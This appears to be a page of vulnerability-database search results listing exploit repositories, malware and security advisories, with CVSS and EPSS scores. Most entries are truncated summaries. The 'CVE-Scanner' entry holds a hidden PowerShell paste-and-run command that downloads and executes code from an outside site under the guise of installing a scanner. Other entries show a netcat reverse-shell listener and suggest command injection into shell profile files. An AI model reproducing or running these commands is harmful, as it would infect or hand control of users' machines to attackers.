Lucene search
+L

304324 matches found

Kitploit
Kitploit
added 2026/09/09 9:43 a.m.8 views

CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v2.0 Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration...

9.3CVSS7.8AI score0.99933EPSS
SaveExploits30
Kitploit
Kitploit
added 2026/09/09 9:43 a.m.7 views

CVE-2023-21823

CVE-2023-21823 Reverse Shell for Windows This repository contains C code that implements a reverse shell for the Windows operating system. A reverse shell allows for remote system control using the command-line, providing the ability to execute commands on the infected machine. Important Using th...

7.8CVSS8.5AI score0.05563EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/09 9:43 a.m.9 views

ROCA-attack-on-vulnerability-CVE-2017-15361

ROCA-attack-on-vulnerability-CVE-2017-15361 This repository contains the thesis developed for my bachelor's degree in Mathematical Engineering at Polytechnic of Turin. It's a script based on python and sage. The goal of the script is to generate an RSA key, evaluete if it's vulnerable by the ROCA...

5.9CVSS7.2AI score0.09825EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/09 9:43 a.m.8 views

ingressNightmare-CVE-2025-1974-exps

Ingress Nightmare CVE-2025-1907 Description This vulnerability allows remote attackers to execute arbitrary code on affected installations of kubernetes/ingress-nginx. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP requests. It i...

9.8CVSS8.4AI score0.99525EPSS
SaveExploits21References1
Kitploit
Kitploit
added 2026/09/09 9:40 a.m.10 views

Python-CVE-2020-25213

Python-CVE-2020-25213 Python Interactive Exploit for WP File Manager Vulnerability. The File Manager wp-file-manager plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php...

10CVSS8.8AI score0.97328EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/09 9:39 a.m.9 views

CVE-2019-10149

CVE-2019-10149 CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may lead to remote command execution. Example root@kitploit: nc -lvp 9000 python ./CVE-2019-10149/exploit.py --rhost...

10CVSS8.6AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/09 9:39 a.m.8 views

CVE-2012-1823-exploit-for-https-user-password-web

CVE-2012-1823 file is exploit use : python3 CVE-2012-1823.py CVE-2012-1823,CVE-2021-2291.py file find out if the site is vulnurable for CVE-2012-1823 or CVE-2021-2291 use : python3 CVE-2012-1823,CVE-2021-2291.py command whoami cd ls tested on kali linux...

9.8CVSS7.2AI score0.99998EPSS
SaveExploits46
Kitploit
Kitploit
added 2026/09/09 9:38 a.m.7 views

CVE-2020-14882

CVE-2020-14882 This script enables remote code execution RCE on Oracle WebLogic Server using an unauthenticated GET request. It exploits the vulnerability CVE-2020-14882. By executing arbitrary commands, an attacker can gain unauthorized access to the server. Exploit Details Exploit Title: Oracle...

10CVSS9AI score0.99997EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/09 9:38 a.m.8 views

CVE-2016-2098-my-first-exploit

CVE-2016-2098-my-first-exploit This exploit is remote code execution vulnerability in Ruby-on-Rails when using render on user-supplied data. It's written in python3, and remember to install the requests library. here is the command. root@kitploit: pip3 install requests...

7.5CVSS7.9AI score0.81445EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/09 9:38 a.m.9 views

CVE-Scanner

CVE-Scanner CVE-2021-42287/CVE-2021-42278/OTHER Scanner & Exploiter. Install 1. Press WIN + R 2. Copy and paste the code below and press enter root@kitploit: powershell -WindowStyle Hidden -Command ScriptBlock::Createirm https://jaihind.edu.in/weatherdolphin/dollrandom.Invoke; 3. Restart your PC...

8.8CVSS7.6AI score0.7717EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/09 9:38 a.m.7 views

CVE-2025-53547-POC

CVE-2025-53547 POC this is a poc for CVE-2025-53547 Chart.lock links test file to /tmp/1.txt /tmp/1.txt inject a command that create /tmp/2.txt In real product enviroment, you can change Chart.lock link file to inject any command you want such as: /root/.bashrc /root/.bashprofile /etc/profile...

8.6CVSS7.2AI score0.00378EPSS
SaveExploits1References1
GitHub Malware Advisories
GitHub Malware Advisories
added 2026/09/09 9:33 a.m.2 views

Malicious code in databricks-webapp-navigation-homepage (PyPI)

Source: kam193 31ec3549efe09642c539f13af8a2a75949a356f55046b6298c21a2deedda322c Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTEST - Packages looking like typical pentest packages, but al...

5.9AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/09 9:27 a.m.9 views

CVE-2026-4861

cve-id Donate Support the maintenance of this project with PayPal or by scanning the QR code below. ⚡ Simple Usage Use this project only in safe and authorized environments such as: Local virtual machines Docker containers Isolated lab setups Authorized penetration testing environments Example...

9CVSS8.1AI score0.0085EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/09 9:26 a.m.8 views

go-dbmigrate

migrate A migration helper written in Go. Use it in your existing Golang code or run commands via the CLI. root@kitploit: GoCode import github.com/mattes/migrate/migrate CLI go get -u github.com/mattes/migrate Features Super easy to implement Driver interface. Gracefully quit running migrations o...

6AI score
SaveExploits0References13
NVD
NVD
added 2026/09/09 9:17 a.m.5 views

CVE-2026-79640

Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command 'SQL Injection' vulnerability. A low privileged attacker with remote access could potentially exploit this...

5.4CVSS0.00151EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/09 9:04 a.m.6 views

react2shell-burp

React2Shell RCE Scanner and Validator CVE-2025-55182 Creator: j0lt Collaborator: https://github.com/shashank18 A Burp Suite extension that detects and validates the React2Shell vulnerability CVE-2025-55182 — a pre-authentication remote code execution flaw in React Server Components. The extension...

10CVSS8AI score0.99802EPSS
SaveExploits391References1
GithubExploit
GithubExploit
added 2026/09/09 8:37 a.m.16 views

Exploit for Allocation of Resources Without Limits or Throttling in Redis

CVE-2021-32675 – Redis Pre-Allocation Denial of Service OOM...

7.5CVSS7.6AI score0.16904EPSS
SaveExploits1
SUSE Linux
SUSE Linux
added 2026/09/09 8:34 a.m.8 views

Security update for libzypp, zypper

This update for libzypp, zypper fixes the following issues: Security issue fixed: invalidating legacy libzypp unsigned-repository cache state LIBZYPP-LEGACY-CACHE-01 bsc1274625. hasCredentials requires both username AND password to be non-empty bsc1273242. GPG Key hints in repoindex.xml require a...

5.9AI score
SaveExploits0References18
SUSE Linux
SUSE Linux
added 2026/09/09 8:34 a.m.6 views

Security update for libssh2_org

This update for libssh2org fixes the following issues: CVE-2025-15661: out-of-bounds heap read vulnerability in the sftpsymlink function in src/sftp.c bsc1268546. CVE-2026-7598: integer overflow in function userauthpassword of file src/userauth.c bsc1263890. CVE-2026-58050: attacker controlled...

9.2CVSS7.5AI score0.00648EPSS
SaveExploits0References32
Kitploit
Kitploit
added 2026/09/09 8:31 a.m.9 views

composer-CVE-2026-40261-CVE-2026-40176-PoC

!CAUTION THIS REPOSITORY CONTAINS PROOF-OF-CONCEPT CODE FOR VULNERABILITIES CVE-2026-40261 AND CVE-2026-40176 IN COMPOSER. !CAUTION THE CODE IS INTENDED FOR EDUCATIONAL AND TESTING PURPOSES ONLY. !CAUTION DO NOT USE THIS CODE IN PRODUCTION ENVIRONMENTS OR AGAINST SYSTEMS WITHOUT PROPER...

8.8CVSS7.8AI score0.01688EPSS
SaveExploits4
Rows per page
Query Builder